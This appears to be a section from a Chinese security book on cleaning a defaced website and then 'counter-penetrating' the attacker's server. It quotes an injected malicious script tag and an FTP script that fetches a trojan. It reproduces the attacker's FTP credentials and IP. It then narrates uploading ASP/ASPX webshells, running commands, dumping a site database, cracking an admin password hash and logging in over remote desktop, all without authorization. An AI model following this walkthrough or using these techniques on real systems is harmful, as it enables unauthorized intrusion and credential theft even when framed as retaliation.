2.13 社工渗透并提权某服务器
笔者的一个朋友在访问自己公司的网站时找出了很多奇怪的文件,杀毒软件提示网页存在病毒,笔者的第一感觉就是服务器被入侵了。
2.13.1 网站挂马的检测和清除
1.使用软件嗅探被挂马页面
在虚拟机中使用URLSnooper软件对网站进行嗅探,果然发现网站的多个文件被挂马,如图2-126所示。登录远程终端后,发现服务器配置较高,带宽是20MB/s光纤,访问网络的速度非常快,确实是攻击者眼中高质量的肉机。
图2-126 使用URLSnooper监听网站的所有链接和访问
说明
· URLSnooper是一款安全检查工具,根据名称就知道该软件的作用是进行URL监视,笔者认为它是一款捕捉网站是否挂马的好程序。URLSnooper的安装比较简单,安装完毕后需要安装默认的抓包软件。
·确认网站被挂马后,首先要将网站文件进行备份。
直接到网站根目录查看网站文件的最近修改时间,首页的更改时间为8月25日,因此可以借助系统的文件搜索功能搜索8月24日至8月26日之间的文件。如图2-127所示,搜索出几十个文件。被修改的文件很有特点,index.html、index.asp、conn.asp、top.asp、foot.asp及js文件均被修改,从文件中可以看出,该攻击者绝对是一个团伙或者一个老手,他不是对所有文件进行挂马,而是有针对性地对关键文件进行挂马。
图2-127 查找被修改的网站文件
2.清除挂马代码
在所有文件中查找代码“<script src=http://%61%76%65%31%2E%63%6E></script>”并将其清除。
2.13.2 入侵痕迹的搜索和整理
对系统目录及服务器的所有目录进行查看,发现该攻击者使用过“1433全自动扫描传马工具”。通过对该工具软件的研究和分析得知,它需要使用配置文件来下载木马。果不其然,在系统目录下发现文件cc1.txt的生成日期是5月29日,大小只有64字节,用type命令显示如下。
open 122.138.14.8
gusdn
lixuanyu
binary
get 1.exe
bye
该文件是FTP自动下载的配置信息。直接使用CuteFTP软件进行FTP登录尝试,填好IP地址、账号和密码,顺利登录,如图2-128所示。从服务器中的文件不难看出,这台机器的FTP路径是Windows系统某个磁盘的根目录,里面有不少黑客工具,机主肯定是一个攻击者或者安全爱好者。
图2-128 成功登录FTP服务器
说明
很多攻击者在利用网上下载的工具时,没有很好地设置和改造,只是进行简单的配置后便开始攻击,因此,在肉机上经常会留下各种木马的安装文件,有时甚至有FTP自动上传文件的配置文件。可以使用“dir/od/a”命令查看当前目录中的文件,小于100字节的文件极有可能为配置文件。
使用扫描工具软件查看该计算机开放了哪些端口。如图2-129所示,系统开放了80端口和远程终端服务3389端口。
图2-129 查看远程服务器开放端口
2.13.3 利用社会工程学进行反渗透
1.使用获取的FTP账号猜测服务器登录口令
既然服务器开放了3389端口、FTP服务,那么可以尝试利用FTP的账号和口令登录它的3389远程桌面,猜测administrator的口令。结果不是gusdn,也不是lixuanxu,说明使用FTP账号和口令不能进入系统。所以,需要换一个思路。
2.从网站入手
使用IE浏览器打开该IP地址,可以正常访问网站。该服务器提供了Web服务,网站为游戏私服服务器,如图2-130所示,通过HDSI及Domain 3.5等SQL注入工具对网站进行探测,未找到可以利用的地方。
图2-130 服务器提供Web服务
3.从FTP目录入手
在FTP的目录中有一个Web子目录,会不会与网站有关系呢?先上传一个ASP木马到Web目录试试——这个目录居然正是网站的根目录,ASP木马可以正常运行。如图2-131所示,通过ASP木马在网站中看了看,发现可以浏览所有磁盘,不过只有D盘有写权限。与FTP中的文件进行对比,发现FTP的根目录就是D盘。
图2-131 上传ASP木马
现在,既可以上传文件,也可以浏览文件了。要想提升权限,必须能执行命令。笔者上传了一个ASP的CMD木马到Web目录下,结果竟然不能执行。继续利用ASP木马在机器上寻找其他突破口,结果一无所获。FTP不是用Serv-u开的,C盘不可写,不能执行命令,怎么办?
4.上传ASP.NET木马提升系统权限
在用3389登录这台机器时,它的操作系统是Windows Server 2003,可能支持ASP.NET。上传一个ASPX的CMD木马,ASPX木马能执行命令了,如图2-132所示。查看机器的用户列表,居然没有administrator,却有一个xuanyu,而FTP的口令是“lixuanyu”,一定是管理员把超级用户改名了。它的口令会是什么呢?还是用3389登录器测试一下,不是“gusdn”,不是“lixuanyu”,更不是“12345678”——猜不出来了。
图2-132 使用ASP.NET木马查看系统管理员账号
5.获取数据库用户管理员密码
按照密码设置习惯,攻击者极有可能使用了相同的密码,因此可以尝试获取数据库中用户的密码来登录远程终端服务器。使用CuteFTP对整个网站目录中的文件进行查看,在TT目录下发现数据库文件“$_$%●yingzi★! #%&^$#.asa”。使用FTP下载这个文件,把文件的后缀改为“mdb”,使用Access直接打开该数据库,如图2-133所示,从中找到管理员使用的表Gq_Admin。
图2-133 获取管理员表Gq_Admin
从表Gq_Admin中发现存在gusdn用户,并且是高级管理员,密码使用MD5加密后是“5334e6dd7b8exxxx”。打开网页www.cmd5.com,填好16位密码,解密后密码为“12703XXX”,如图2-134所示。
图2-134 获取用户的密码
6.再次登录远程终端
直接打开远程终端连接器,在其中输入用户名“xuanyu”,密码“12703XXX”,然后单击“连接”按钮,很快就成功进入该计算机,如图2-135所示。
图2-135 成功进入攻击者计算机服务器